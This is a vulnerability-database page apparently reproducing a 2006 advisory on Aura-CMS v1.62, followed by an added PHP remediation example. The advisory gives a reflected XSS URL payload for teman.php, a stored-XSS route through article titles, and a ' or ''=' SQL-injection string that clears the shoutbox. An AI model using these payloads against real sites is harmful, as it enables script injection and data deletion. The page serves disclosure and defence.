Aura-CMS v1.62 XSS vulnerable

CVE               : CVE-2018-20455
Category          : CWE-79
Price             : $500
Severity          : High
Author            : Unknown
Risk              : High
Exploitation Type : Remote
Date              : 2006-07-25
CVSS              : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
EPSS              : 0.02192
EPSSP             : 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070077

Below is a copy:

by : iFX a.k.a inversFX
  _______________________________
[	apem-zigzag (at) telkom (dot) net	]
[	inversfx (at) yahoo (dot) com	]
  -------------------------------
locate : Indonesia, Jakarta
--------------------------------
date   : 29/06/2006
--------------------------------
title  : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif (at) ayo.kliksini (dot) com
                http://www.auracms.tk
                http://www.semarang.tk
                http://www.ayo.kliksini.com
                http://www.auracms.opensource-indonesia.com
--------------------------------

PoC :
--------------------------------------------------------------------

1.  in 'teman.php' we can see the code :

.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang 
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....

We found something here: the variable $judul_artikel is echoed into the page as-is,
	so we can XSS from the URL :

1st ex:
	http://localhost/teman.php?judul_artikel=<script>alert("mati dah gwa!!!")</script>

2nd ex:
	Or we can send an article to the admin with the XSS code in its title,
	so that when an anonymous visitor opens index.php, the script runs.
---------------------------------------------------------------------

2.  We found something here that can delete all shoutbox messages.
	As usual, we can shout anonymously with a fake name, mail, pesan.
	Here, when I insert

name  = ' or ''='			<== old SQL injection code
mail  = test_string			<== you can fill it with a free mail address
pesan = ' or ''='			<== old SQL injection code

then all the messages in it were cleared, amazingly....

----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------

sorry for my words in English, cuz I often REMED!!!
                                                            _________________
       /Shout :|       |X|
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, ||||||||.                     |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, Shock-3d, G4mMa, Big_Red_One }    |
-------------------------------------------------------------------------------------
                                                               |OK | Apply | Cancel |
                                                               ----------------------
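A defensive counterpart to both findings above, as an added example that is not part of the advisory or of AuraCMS: the teman.php output with the title HTML-encoded, and a shoutbox insert that binds its fields as parameters. The advisory does not show the shoutbox code, so the function names, the shoutbox table, its columns and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example, not AuraCMS code. Function, table and column names are hypothetical.

// 1. teman.php: read the parameter explicitly and encode it for the HTML context.
function render_teman(array $query): string
{
    // Take the title from the request array rather than from a variable
    // that the request can populate directly.
    $judul = (isset($query['judul_artikel']) && is_string($query['judul_artikel']))
        ? $query['judul_artikel']
        : '';
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
    $safe = htmlspecialchars($judul, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return "<p class=\"judul\">Kirim ke Teman</p>\n"
         . "<p class=\"konten\">Anda ingin memberitahu teman Anda tentang "
         . "artikel ini yang berjudul : <b>{$safe}</b>.</p>";
}

// 2. Shoutbox: bind user input as parameters so quote characters stay data.
function add_shout(PDO $db, string $name, string $mail, string $pesan): void
{
    $stmt = $db->prepare(
        'INSERT INTO shoutbox (name, mail, pesan) VALUES (:name, :mail, :pesan)'
    );
    $stmt->execute([':name' => $name, ':mail' => $mail, ':pesan' => $pesan]);
}

// Constructed demo data on an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE shoutbox (name TEXT, mail TEXT, pesan TEXT)');

add_shout($db, 'budi', 'budi@example.com', 'halo');
// The field values from the advisory are stored as ordinary text.
add_shout($db, "' or ''='", 'test_string', "' or ''='");

// The title from the advisory's first example is rendered as inert text.
echo render_teman(['judul_artikel' => '<script>alert("mati dah gwa!!!")</script>']), "\n";
echo 'rows in shoutbox: ', $db->query('SELECT COUNT(*) FROM shoutbox')->fetchColumn(), "\n";
```

The same encoding applies wherever a submitted article title is printed, such as index.php in the advisory's second example.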

Copyright ©2024 Exploitalert.
